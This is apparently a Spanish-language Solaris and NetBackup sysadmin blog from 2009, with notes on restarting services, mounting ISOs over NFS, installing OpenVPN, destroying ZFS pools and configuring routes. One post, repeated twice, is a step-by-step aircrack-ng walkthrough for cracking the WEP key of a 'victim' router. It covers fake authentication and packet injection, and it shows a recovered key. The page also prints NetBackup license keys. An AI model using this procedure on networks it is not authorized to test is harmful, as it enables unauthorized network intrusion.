martes, 24 de noviembre de 2009
Como solucionar el problema de mediaserver offline
1) La maquina server1 se le expiro la licencia de NB. Se agrego la licencia tanto en el Media server como en el Masterserver, pero la maquina seguia apareciendo como:
server1 654000 OFFLINE
2) Se trato de activar el mediaserver mediante el comando:
#vmoprcmd -activate_host -h server1 //Desde el Master
Pero al generar este comando presento un error en el demonio de VM del media server.
3) Ingrese al media server y active el demonio vmd, y debe quedar asi:
4) Despues de activar el demonio se debe volver a lanzar el comando.
martes, 17 de noviembre de 2009
jueves, 12 de noviembre de 2009
miércoles, 11 de noviembre de 2009
Como subir o bajar el NOM (Veritas Netbackup Operator Manager)
1. Ingresamos a la ruta donde se encuentra el demonio que sube todos los servicios del NOM.
root@servidor1 #cd /opt/VRTSnom/bin
2. Miramos el status del demonio.
root@servidor1 #./nom_server status
Veritas NOM processes
---------------------
UID PID PPID C STIME TTY TIME CMD
root 1278 1 0 Oct 02 ? 0:00 /opt/VRTSpbx/bin/pbx_exchange
root 1321 1 0 Oct 02 ? 0:02 /opt/VRTSat/bin/vxatd
root 1526 1 0 Oct 02 ? 515:34 ./NOM_dbsrv -o /opt/VRTSnom/logs/nomdbsrv.log @/opt/VRTSnom/var/global/nomserve
root 1616 1 0 Oct 02 ? 3296:20 /opt/VRTSnom/bin/VRTSnomd -Xmx512m -classpath /opt/VRTSjre/jre1.5/lib/tools.jar
root 1719 1 0 Oct 02 ? 5687:45 /opt/VRTSjre/jre1.5/bin/java -Dvrtsat.libpath=/opt/VRTSat/lib -Dvrtsweb.home=/o
3. Detenemos el servicio
root@servidor1 # ./nom_server stop
Stopping Veritas NOM Web Server
Web application "nom" shutdown successfully
Stopping Veritas NOM Server
Stopping VRTSnomd (15) ...
stopping the NOM Database Server
Adaptive Server Anywhere Stop Engine Utility Version 9.0.2.3323
4. Iniciamos nuevamente el servicio
root@servidor1 # ./nom_server start
Starting Veritas NOM Server
Starting NOM database
NOM Database Server started (pid 3060)
The following users have been Authorized for access in PBX:
Auth User:0 : root
starting VRTSnomd...
VRTSnomd started, pid = 3099
Starting Veritas NOM Web Server
Starting the web server.....done.
Web Application "nom" started successfully
Veritas NOM processes
---------------------
UID PID PPID C STIME TTY TIME CMD
root 1278 1 0 Oct 02 ? 0:00 /opt/VRTSpbx/bin/pbx_exchange
root 1321 1 0 Oct 02 ? 0:03 /opt/VRTSat/bin/vxatd
root 3060 1 0 10:56:29 ? 0:18 ./NOM_dbsrv -o /opt/VRTSnom/logs/nomdbsrv.log @/opt/VRTSnom/var/global/nomserve
root 3099 1 8 10:56:38 pts/2 0:30 /opt/VRTSnom/bin/VRTSnomd -Xmx512m -classpath /opt/VRTSjre/jre1.5/lib/tools.jar
root 3162 1 1 10:56:46 pts/2 0:55 /opt/VRTSjre/jre1.5/bin/java -Dvrtsat.libpath=/opt/VRTSat/lib -Dvrtsweb.home=/o
Como Montar un ISO en Solaris
lofiadm -a /image/NBU65/dvd2/NBU65_DVD2.iso
2. Ahora montamos la unidad virtual en una ruta fisica
mount -F hsfs -o ro /dev/lofi/1 /mnt/dvd2/
3. Ahora podemos ingresar al directorio donde quedo montado el dispositivo virtual.
cd /mnt/dvd2
Lo anterior solamente era para que se pueda ver sobre la maquina que tengo el iso. Ahora tengo que compartirlo por NFS para que cualquier maquina lo pueda utilizar. Para ello hacemos lo siguiente:
4. Configurarmos el file system para que pueda ser accedido via NFS:
share -F nfs -o ro /mnt/dvd2/
5. Validamos que si realmente se este compartiendo:
share
RESOURCE SERVER ACCESS TRANSPORT
masterserver2:/backup masterserver2 - -
masterserver2:/backup_proxy masterserver2 - -
masterserver2:/bkOracle masterserver2 - -
masterserver2:/image masterserver2 - -
masterserver2:/pva masterserver2 - -
masterserver2:/export/srt/Solaris_10 masterserver2 - -
masterserver2:/mnt/dvd2 masterserver2 - -
En este momento vemos que si se esta compartiendo por NFS el file system /mnt/dvd2.
Ahora vamos a la maquina cliente donde queremos hacer uso de ese file system compartido (ej: masterserver1).
6. Encontrandonos dentro de la maquina cliente montamos el nfs que se encuentra en masterserver2 asi:
mount -F nfs -o ro masterserver2:/mnt/dvd2 /mnt/dvd2
Teniendo en cuenta que anteriormente debimos haber creado el file system /mnt/dvd2 en la maquina cliente.
7. Listo ya podemos utilizar la informacion que se encuentra actualmente montada sobre masterserver2.
martes, 10 de noviembre de 2009
Instalacion y configuracion OpenVpn Opensolaris
Este es el proceso empleado para instalar openvpn OpenSolaris 11.06
Primero debemos instalar las dependencias:
pkg install SUNWgcc
Descargar las fuentes de tun/tap.
cd /usr/local/src
wget http://www.whiteboard.ne.jp/~admin2/tuntap/source/tuntap/tuntap.tar.gz
tar xvfz tuntap.tar.gz
chown -R root:root tuntap
cd tuntap
Cambiar la configuracion del Makefile.in
LDFLAGS = -melf_x86_64
...
modules: tun.o tap.o
$(LD) $(LDFLAGS) -r -o tun tun.o
$(LD) $(LDFLAGS) -r -o tap tap.o
./configure
make
Configurar tun.
# devfsadm –i tun
Validar los mensajes del syslog.
#dmesg
Instalar LZO para compresion en Tiempo Real:
# wget http://www.oberhumer.com/opensource/lzo/download/lzo-2.03.tar.gz
# gzcat lzo-2.03.tar.gz | tar xvf lzo-2.03.tar.gz
# gzcat lzo-2.03.tar.gz | tar xvf -
# cd lzo-2.03
# ./configure
# make
# make install
Instalar OpenVPN.
wget http://openvpn.net/release/openvpn-2.0.9.tar.gz
# gzcat openvpn-2.0.9.tar.gz | tar xvf –
# cd openvpn-2.0.9
##### ./configure --disable-lzo # Para deshabilitar compresion de lzo
# ./configure --with-lzo-lib=/usr/local/lib
# make
# make install
Crear un archivo de start/stop para subir el servicio automaticamente:
#!/bin/bash
case "$1" in
'start')
echo "Starting Openvpn"
nohup /usr/local/sbin/openvpn --config /etc/openvpn/pegasus.conf --writepid /var/run/openvpnd.pid &
;;
'stop')
echo "Stoping Openvpn"
if [ -f /var/run/openvpnd.pid ]; then
PID=`cat /var/run/openvpnd.pid`
kill -9 $PID
ifconfig tun0 unplumb
fi
;;
*)
echo "Usage: $0 { stop | start }"
exit 1
;;
esac
Crear el archivo de configuracion similiar a:
client
dev tun
# tun-mtu 1500
tun-mtu 1434
proto udp
#remote 201.228.144.5 1194
remote 10.201.136.36 1194
ca /etc/openvpn/ca.crt
cert /etc/openvpn/pegasus.crt
key /etc/openvpn/pegasus.key
ping 30
ping-exit 66
verb 6
mute 20
comp-lzo
viernes, 6 de noviembre de 2009
Aderir una nueva licencia de NB para un cliente
NetBackup Eval Keys Hard End Date of 12/31/2009
NetBackup 6.5 Evaluation License (posted 10/22/09)
NetBackup Server,Cross Platform,Enterprise Server,v6.5, 60-Day Evaluation License
OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36 //Esta es la licencia
//Ahora aplicamos la licencia estando sobre la maquina: (Ejemplo sg-des-ccol10-bck)
#/usr/openv/netbackup/bin/admincmd/get_license_key
License Key Utility
-------------------
A) Add a License Key
D) Delete a License Key
F) List Active License Keys
L) List Registered License Keys
H) Help
q) Quit License Key Utility
Enter a letter: A
Enter license key: OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36
OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36:
Evaluation NetBackup Enterprise Server Base product with the following features enabled:
PureDisk Remote Office
PureDisk Option
SAN Client
PureDisk MS Exchange Agent
Enterprise Vault Agent
PureDisk MS SQL Server Agent
Flexible Disk Option
OpenStorage Disk Option
NAS SnapVault Option
Virtual Tape Option
Bare Metal Restore
Encryption
Open File Backup
Remote Client Support
Robotic Library Sharing Support
Remote Media Server Support
Microsoft RSM Robotic Libraries
ADIC DAS/SDLC Robotic Libraries
IBM ATL Robotic Libraries
Fujitsu LMF Robotic Libraries
StorageTek ACS Robotic Libraries
Snapshot Client
MS SharePoint Agent
Inline Tape Copy
Vault
Snapshot Client
GDM Managed Server
Library Based Tape Drives
Additional Drives/Robotics
DataStore
Encryption (Legacy DES 56-bit)
Encryption (Legacy DES 40-bit)
SAP extension
SQL-Backtrack extension
Sybase extension
Informix extension
Oracle extension
Lotus Notes extension
DB2 extension
MS SQL Server extension
MS Exchange extension
Advanced Reporting Option
Shared Storage Option
Global Data Manager
NDMP
EMC
Additional clients
has been registered.
License Key Utility
-------------------
A) Add a License Key
D) Delete a License Key
F) List Active License Keys
L) List Registered License Keys
H) Help
q) Quit License Key Utility
Enter a letter: Q
#
miércoles, 4 de noviembre de 2009
Como validar la licencia de NB instalada en un cliente?
#./bpminlicense -verbose
OENR-9DSF-GEVB-P6C4-PZX6-OG9S-E777-GGEP-PP8P OHN6-PRDN-P3ZO-PD2O-SFGU-N3Z3-WBNK-SO7Y-777S-S6P
file version = 0x05000000
time added = 0x4a9fd672 Thu Sep 03 09:45:06 2009
hostname = sg-des-ccol10-bck
product ID = 6 NetBackup Enterprise Server
serial number = 0
key version = 0x05000000
count = 0
server platform = 0 Any platform
client platform = 0 Any platform
server tier = 10 NetBackup Enterprise Server
client tier = 0 No tier
license type = 0 Time limited demonstration
Site ID = 4095 Unknown site: 4095
Expiration = Expired Tue Nov 03 00:00:00 2009 ///OJO: EXPIRO LA LICENCIA!!!!
Firm Expiration = Not expired Mon Nov 30 00:00:00 2009
Feature ID = 86 PureDisk Remote Office -
Feature ID = 85 PureDisk Option -
Feature ID = 84 SAN Client -
Feature ID = 83 PureDisk MS Exchange Agent -
Feature ID = 81 Enterprise Vault Agent -
Feature ID = 80 PureDisk MS SQL Server Agent -
miércoles, 7 de octubre de 2009
Validar volumenes en zfs - desmontarlo y destruirlo
root@masterserver2 # zpool list //Lista los pool zfs actualmente creados
NAME SIZE USED AVAIL CAP HEALTH ALTROOT
backup_pva 3.17T 325M 3.17T 0% ONLINE -
storage0 527G 142G 385G 26% ONLINE -
root@masterserver2 # zpool status backup_pva //Lista los discos que se encuentran atachados al un pool zfs Ej: backup_pva
pool: storage0
state: ONLINE
scrub: none requested
config:
NAME STATE READ WRITE CKSUM
backup_pva ONLINE 0 0 0
c3t600A0B800011EF78000079F34832C463d0s0 ONLINE 0 0 0
c3t600A0B800011EE120000A45C4958A7D8d0s2 ONLINE 0 0 0
c3t600A0B800011EE120000A577496DE26Ad0s0 ONLINE 0 0 0
zfs unmount -f backup_pva/pva //Desmontamos el volumen fisico zfs
zfs destroy -r backup_pva //Destruimos el volumen zfs
zpool destroy -r backup_pva //Destruimos el Pool zfs
viernes, 4 de septiembre de 2009
Como generar reporte de status (alarmas, estadisticas) del arreglo 6540
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX
//Identificamos cual array es al que queremos generar el reporte: escogemos el stk6540-01
root@masterserver # sscs list array
Array: arregloremoto-stk6140-01
Array: arreglolocal-stk6140-01
Array: stk6540-01
Array: ARRAY01
Array: ARRAY02
//Aplicamos el siguiente comando:
root@masterserver # /opt/SUNWsefms/bin/supportData -d stk6540-01 -p /export/home/usuario -o supporData_stk6540-01
Starting the collection process for stk6540-01
Starting data collection
Collecting the array profile...
Collecting the MEL data...
Collecting the RLS data...
Collecting persistant registrations...
Collecting bad block data...
Collecting the drive log data...
Collecting the object bundle...
Collecting the alarm data...
Collecting the state capture...
Collecting the NVSRAM data...
Collecting the volume statistics...
Collecting the SOC data...
Zipping up the data files
Completion Status: Task completed succesfully.
La siguiente es la sintaxis de comando:
//The "supportData" utility is in the directory /opt/SUNWsefms/bin/
//The syntax to run the "supportData" utility is :
//
//supportData -d
//
//Valid identifiers are the
//
//where :
//
//
//
//
//
//
//and :
//
//
//
//
//The output file will be in a zip format.
miércoles, 2 de septiembre de 2009
CLI - Reporte volumenes array 6540
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX
//Sequimos con el comando que indica con que array queremos trabajar, con cual virtual disk y que nos de una relacion de los volumenes y las caracteristicas del virtual disk.
root@masterserver # sscs list --array stk6540-01 vdisk 1
Virtual Disk: 1
Status: Optimal
State: Ready
Number of Disks: 10
RAID Level: 1
Total Capacity: 681.135 GB
Configured Capacity: 594.000 GB
Available Capacity: 87.135 GB
Array Name: stk6540-01
Array Type: 6540
Disk Type: Fibre Channel
Maximal Volume Size: 3.129 GB
Associated Disks:
Disk: t0d05
Disk: t0d04
Disk: t0d03
Disk: t0d02
Disk: t0d01
Disk: t1d01
Disk: t1d02
Disk: t1d03
Disk: t1d04
Disk: t1d05
Associated Volumes:
Volume: heo_01_v4901_ora_datos
Volume: heo_01_v4901_ora_indices
Volume: heo_01_v4902
Volume: heo_01_v4902_ora_datos
Volume: heo_01_v4904
Volume: stk5320-01-H0_ndmp
Volume: stk5320-01-H1_ndmp
viernes, 31 de julio de 2009
Creación de Zonas - Solaris
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive
add net
set physical=nxge1
set physical=nxge2
end
verify
commit
miércoles, 29 de julio de 2009
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.
3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision
#iwconfig wifi0 rate 1M
4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier archivo.
NOTA: tambien se puede hacer de la siguiente manera:
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6
5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.
Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:
….
Equivalente en ASCII: LADINO4763356
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.
3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.
#iwconfig wifi0 rate 1M
4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier nombre para este archivo.
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemplo encontramos una ESSID:LD, BSSID:
5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6. Ahora empezaremos a intectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.
.....
Equivalente en ASCII: LADINO4763356
lunes, 27 de julio de 2009
Configuracion Interfaz BMC Sun Blade 6250
-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true
//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network
viernes, 10 de julio de 2009
Agregar rutas estaticas - Solaris
# netstat -rn
Routing Table: IPv4
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
172.28.250.98 172.28.250.98 UGH 1 0
172.28.250.99 172.28.250.99 UGH 1 0
172.28.250.97 172.28.250.97 UGH 1 481
172.28.250.100 172.28.250.100 UGH 1 272
172.28.250.101 172.28.250.101 UGH 1 3
172.20.45.231 172.20.45.231 UGH 1 0
172.20.45.230 172.20.45.230 UGH 1 0
192.168.100.0 192.168.100.1 U 1 0 bge853000:1
140.126.65.0 140.126.65.1 U 1 0 bge45000:1
172.16.150.0 172.28.249.254 UG 1 3
172.20.45.0 172.20.45.14 U 1 30197 bge45000:2
172.20.45.0 172.20.45.14 U 1 0 bge45000
172.20.45.0 172.20.45.14 U 1 6692 bge45001
172.28.248.0 172.28.250.94 U 1 198287 bge853000:2
172.28.248.0 172.28.250.94 U 1 0 bge853000
172.28.248.0 172.28.250.94 U 1 10591 bge853001
172.28.0.0 172.28.251.254 UG 1 12905
224.0.0.0 172.28.250.94 U 1 0 bge853000:2
default 172.20.45.250 UG 1 5985
127.0.0.1 127.0.0.1 UH 7626145638 lo0
//Agregando una ruta para acceder a una red
# route add net 192.168.16.0 10.0.2.15 //Para acceder a la red 192.168.16.0, lo voy a hacer desde la gateway 10.0.2.15
//Removiendo una ruta para acceder a una red
# route delete net 192.168.16.0 10.0.2.15
viernes, 3 de julio de 2009
Como Agregar tamaño a la Swap - Solaris
#swap -a /opt/swapfile //Con esto estoy habilitando el archivo creado para que se adhiera a la swap actual